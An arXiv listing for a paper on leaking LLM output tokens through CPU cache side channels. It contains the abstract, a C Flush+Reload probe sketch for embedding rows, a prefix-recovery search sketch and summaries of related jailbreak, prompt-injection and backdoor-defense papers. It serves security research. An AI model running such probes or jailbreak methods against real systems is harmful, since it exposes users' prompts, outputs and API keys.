Spill The Beans: Exploiting CPU Cache Side-Channels to Leak Tokens from Large Language Models
- URL: http://arxiv.org/abs/2505.00817v1
- Date: Thu, 01 May 2025 19:18:56 GMT
- Title: Spill The Beans: Exploiting CPU Cache Side-Channels to Leak Tokens from Large Language Models
- Authors: Andrew Adiletta, Berk Sunar
- Abstract summary: We introduce Spill The Beans, a novel application of cache side-channels to leak tokens generated by Large Language Models (LLMs). A significant challenge is the massive size of LLMs, whose compute-intensive operation quickly evicts embedding vectors from the cache. Monitoring more tokens increases potential vocabulary leakage but raises the chance of missing cache hits due to eviction. Our findings reveal a new vulnerability in LLM deployments, highlighting that even sophisticated models are susceptible to traditional side-channel attacks.
- License: http://creativecommons.org/licenses/by-nc-nd/4.0/
- Abstract: Side-channel attacks on shared hardware resources increasingly threaten confidentiality, especially with the rise of Large Language Models (LLMs). In this work, we introduce Spill The Beans, a novel application of cache side-channels to leak tokens generated by an LLM. By co-locating an attack process on the same hardware as the victim model, we flush and reload embedding vectors from the embedding layer, where each token corresponds to a unique embedding vector. When the victim accesses one of these vectors during token generation, the access produces a cache hit detectable by our attack on the shared lower-level caches. A significant challenge is the massive size of LLMs: their compute-intensive operation quickly evicts embedding vectors from the cache. We address this by balancing the number of tokens monitored against the amount of information leaked. Monitoring more tokens increases potential vocabulary leakage but raises the chance of missing cache hits due to eviction; monitoring fewer tokens improves detection reliability but limits vocabulary coverage. Through extensive experimentation, we demonstrate the feasibility of leaking tokens from LLMs via cache side-channels. Our findings reveal a new vulnerability in LLM deployments, highlighting that even sophisticated models are susceptible to traditional side-channel attacks. We discuss the implications for privacy and security in LLM-serving infrastructures and suggest considerations for mitigating such threats. As a proof of concept we consider two concrete attack scenarios: our experiments show that an attacker can recover 80%-90% of a high-entropy API key with single-shot monitoring, and for English text we reach a 40% recovery rate in a single shot. These rates depend heavily on the monitored token set and can be improved by targeting more specialized output domains.
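The probe described in the abstract is an application of the classic Flush+Reload primitive to rows of the embedding table. No code accompanies the abstract, so the following is a minimal sketch of that primitive under stated assumptions: MODEL_PATH, ROW_BYTES, the monitored token ids, and the THRESHOLD cycle cutoff are all illustrative placeholders, and the sketch assumes attacker and victim share the embedding table through a common file mapping (e.g., both mmap the same weights file, with the table at offset 0).

```c
/* Flush+Reload sketch in the spirit of Spill The Beans (x86-64 Linux, gcc).
 * All constants below are illustrative assumptions, not values from the paper. */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <x86intrin.h>           /* _mm_clflush, __rdtscp */

#define MODEL_PATH "model.bin"   /* hypothetical shared weights file */
#define ROW_BYTES  8192u         /* hypothetical bytes per embedding row */
#define THRESHOLD  120           /* reload cutoff in cycles; must be calibrated */

/* Time one reload of a cache line; a fast access means the victim touched it. */
static int reload_is_hit(volatile uint8_t *line) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*line;                 /* load the monitored line */
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) < THRESHOLD;
}

int main(void) {
    int fd = open(MODEL_PATH, O_RDONLY);
    if (fd < 0) { perror("open"); return 1; }
    struct stat st;
    if (fstat(fd, &st) < 0) { perror("fstat"); return 1; }
    uint8_t *base = mmap(NULL, st.st_size, PROT_READ, MAP_SHARED, fd, 0);
    if (base == MAP_FAILED) { perror("mmap"); return 1; }

    /* Monitored token set: more tokens cover more vocabulary, but each round
       takes longer, so hits are more likely to be missed due to eviction. */
    int tokens[] = { 17, 203, 911 };   /* hypothetical token ids */
    size_t n = sizeof tokens / sizeof tokens[0];

    for (size_t i = 0; i < n; i++)     /* arm all probes before monitoring */
        _mm_clflush(base + (size_t)tokens[i] * ROW_BYTES);

    for (long round = 0; round < 1000000; round++) {
        for (size_t i = 0; i < n; i++) {
            volatile uint8_t *line = base + (size_t)tokens[i] * ROW_BYTES;
            if (reload_is_hit(line))
                printf("round %ld: token %d touched\n", round, tokens[i]);
            _mm_clflush((const void *)line);   /* re-arm for the next round */
        }
    }
    return 0;
}
```

The tokens[] set is where the paper's coverage-versus-reliability trade-off appears: every extra monitored row lengthens a probing round and raises the chance that the victim's access is evicted again before the probe observes it.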
Related papers
- I Know What You Said: Unveiling Hardware Cache Side-Channels in Local Large Language Model Inference
Large Language Models (LLMs) that can be deployed locally have recently gained popularity for privacy-sensitive tasks. We unveil novel side-channel vulnerabilities in local LLM inference, which can expose both the victim's input and output text. We design a novel eavesdropping attack framework targeting both open-source and proprietary LLM inference systems.
arXiv Detail & Related papers (2025-05-10T19:06:37Z)
- Token-Efficient Prompt Injection Attack: Provoking Cessation in LLM Reasoning via Adaptive Token Compression
"Reasoning Interruption Attack" is a prompt injection attack based on adaptive token compression.<n>We develop a systematic approach to efficiently collect attack prompts and an adaptive token compression framework.<n> Experiments show our compression framework significantly reduces prompt length while maintaining effective attack capabilities.
arXiv Detail & Related papers (2025-04-29T07:34:22Z)
- Layer-Level Self-Exposure and Patch: Affirmative Token Mitigation for Jailbreak Attack Defense
We introduce Layer-AdvPatcher, a methodology designed to defend against jailbreak attacks. We use an unlearning strategy to patch specific layers within large language models through self-augmented datasets. Our framework reduces the harmfulness and attack success rate of jailbreak attacks.
arXiv Detail & Related papers (2025-01-05T19:06:03Z)
- The Early Bird Catches the Leak: Unveiling Timing Side Channels in LLM Serving Systems
A set of new timing side channels can be exploited to infer confidential system prompts and those issued by other users. These vulnerabilities echo security challenges observed in traditional computing systems. We propose a token-by-token search algorithm to efficiently recover shared prompt prefixes in the caches.
arXiv Detail & Related papers (2024-09-30T06:55:00Z)
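The token-by-token search is described only at a high level in this abstract; a minimal greedy sketch of the idea, assuming a hypothetical cache_hit() timing oracle (not an API from the paper) that reports whether a candidate prefix is cached by the serving system, might look like this:

```c
#include <stddef.h>

/* Hypothetical oracle: returns nonzero if the serving system's prompt cache
   responds fast for this candidate prefix (a timing-side-channel hit). */
extern int cache_hit(const int *prefix, size_t len);

/* Greedily recover up to max_len tokens of a shared prompt prefix into out[].
   Each step tries every vocabulary token as the next extension and keeps the
   one the cache confirms; returns the number of tokens recovered. */
size_t recover_prefix(int *out, size_t max_len, int vocab_size) {
    size_t len = 0;
    while (len < max_len) {
        int found = 0;
        for (int tok = 0; tok < vocab_size; tok++) {
            out[len] = tok;
            if (cache_hit(out, len + 1)) { found = 1; break; }
        }
        if (!found)
            break;          /* no extension hits: prefix fully recovered */
        len++;
    }
    return len;
}
```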
- Efficient Inference of Vision Instruction-Following Models with Elastic Cache
We introduce Elastic Cache, a novel strategy for efficient deployment of instruction-following large vision-language models.
We propose an importance-driven cache merging strategy to prune redundant caches.
For instruction encoding, we use access frequency to evaluate the importance of caches.
Results on a range of LVLMs demonstrate that Elastic Cache not only boosts efficiency but also notably outperforms existing pruning methods in language generation.
arXiv Detail & Related papers (2024-07-25T15:29:05Z)
- Human-Interpretable Adversarial Prompt Attack on Large Language Models with Situational Context
This research explores converting a nonsensical suffix attack into a sensible prompt via a situation-driven contextual re-writing.
We combine an independent, meaningful adversarial insertion and situations derived from movies to check if this can trick an LLM.
Our approach demonstrates that a successful situation-driven attack can be executed on both open-source and proprietary LLMs.
arXiv Detail & Related papers (2024-07-19T19:47:26Z)
- CleanGen: Mitigating Backdoor Attacks for Generation Tasks in Large Language Models
We develop a novel inference-time defense, named CLEANGEN, to mitigate backdoor attacks for generation tasks in large language models. CLEANGEN is compatible with state-of-the-art (SOTA) LLMs. Our results show that CLEANGEN achieves lower attack success rates (ASR) compared to five SOTA baseline defenses.
arXiv Detail & Related papers (2024-06-18T04:10:38Z)
- Coercing LLMs to do and reveal (almost) anything
It has been shown that adversarial attacks on large language models (LLMs) can "jailbreak" the model into making harmful statements.
We argue that the spectrum of adversarial attacks on LLMs is much larger than merely jailbreaking.
arXiv Detail & Related papers (2024-02-21T18:59:13Z)
- Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models
We introduce the first benchmark for indirect prompt injection attacks, named BIPIA, to assess the risk of such vulnerabilities. Our analysis identifies two key factors contributing to their success: LLMs' inability to distinguish between informational context and actionable instructions, and their lack of awareness in avoiding the execution of instructions within external content. We propose two novel defense mechanisms, boundary awareness and explicit reminder, to address these vulnerabilities in both black-box and white-box settings.
arXiv Detail & Related papers (2023-12-21T01:08:39Z)
- SmoothLLM: Defending Large Language Models Against Jailbreaking Attacks
We propose SmoothLLM, the first algorithm designed to mitigate jailbreaking attacks on large language models (LLMs).
Based on our finding that adversarially-generated prompts are brittle to character-level changes, our defense first randomly perturbs multiple copies of a given input prompt, and then aggregates the corresponding predictions to detect adversarial inputs.
arXiv Detail & Related papers (2023-10-05T17:01:53Z)
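SmoothLLM's perturb-and-aggregate step is concrete enough to sketch. Below is a hedged illustration: is_jailbroken() is a hypothetical stand-in for querying the target LLM and judging its response (not an API from the paper), and random character replacement is just one simple perturbation scheme.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical oracle: queries the target LLM with `prompt` and returns 1 if
   the response is judged harmful (jailbroken), 0 otherwise. */
extern int is_jailbroken(const char *prompt);

/* Replace roughly `rate` of the characters with random printable ASCII. */
static void perturb(char *s, double rate) {
    for (size_t i = 0; s[i]; i++)
        if ((double)rand() / RAND_MAX < rate)
            s[i] = (char)(' ' + rand() % 95);
}

/* SmoothLLM-style smoothing: judge q independently perturbed copies of the
   prompt and return the majority verdict; the full defense then answers with
   a response whose verdict matches the majority. */
int smoothllm_verdict(const char *prompt, int q, double rate) {
    size_t len = strlen(prompt);
    char *copy = malloc(len + 1);
    if (!copy) return 1;               /* fail closed on allocation error */
    int votes = 0;
    for (int i = 0; i < q; i++) {
        memcpy(copy, prompt, len + 1); /* fresh copy, including the NUL */
        perturb(copy, rate);
        votes += is_jailbroken(copy);
    }
    free(copy);
    return 2 * votes > q;              /* majority vote */
}
```

Because adversarially generated suffixes are brittle to character-level changes (the paper's key observation), most perturbed copies of an attack prompt elicit safe responses, so the majority verdict is "not jailbroken" and the defense can return one of those safe responses instead of the attacked one.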